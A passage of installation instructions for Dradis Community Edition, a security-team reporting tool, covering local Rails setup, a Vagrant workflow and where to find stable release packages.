$ ruby bin/setup
$ bundle exec rails server
You can browse to the app at http://localhost:3000/

Using Vagrant
If you'd like to use dradis in Vagrant, you can use the included Vagrantfile.
# Clone the repo
git clone https://github.com/dradis/dradis-ce.git

# install/start the vagrant box
vagrant up
# ssh into the box
vagrant ssh

# install ruby in the vagrant box
cd /dradis/dradis-ce
rvm install "$(cat .ruby-version)"


# Then you can proceed with standard setup from within Vagrant
ruby bin/setup
# You'll need to tell the server to bind to 0.0.0.0 for port forwarding:
bundle exec rails server -b 0.0.0.0

Stable release
In https://dradisframework.com/ce/download.html you will find the latest packages.

Getting help

Dradis Framework - Collaboration and reporting for IT Security teams

Subscribe to: Posts (Atom)